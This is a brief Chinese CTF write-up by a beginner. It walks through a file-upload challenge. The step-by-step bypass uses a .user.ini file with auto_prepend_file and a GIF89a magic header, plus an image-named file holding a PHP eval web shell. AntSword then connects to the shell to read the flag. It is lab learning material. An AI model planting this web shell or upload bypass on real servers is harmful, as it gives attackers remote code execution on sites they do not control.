这道题对小白的我来说还是很难的,做出这道题我也是看了很多的解答后自己重新试了一遍(我是在window下进行的,在kali稍微有点不一样,就是那个.user.ini得改为user.ini之后再在抓包那里修改为.user.ini就好了(就是第二步))之所以有点不一样是因为kali中"."开头会隐藏。
1.首先我们需要上传两个文件,一个是.user.ini另一个是a.jpg(a可以随意命名)
.user.ini的内容为
GIF89a auto_prepend_file=a.jpg
a.jpg的内容为
1. GIF89a 2. <?=eval($_POST['cmd']);?>
2.接下来先上传.user.ini文件之后用burp抓包
3.然后再上传a.jpg文件
4.上传完之后按fn+f12(笔记本电脑)看网络的url(每个人的可能不太一样)
5.接下来就使用蚁剑连接url就是第四步的网址,密码是cmd
6.连接成功后双击打开网址会出现下面的目录
7.打开flag文件就可以得到flag啦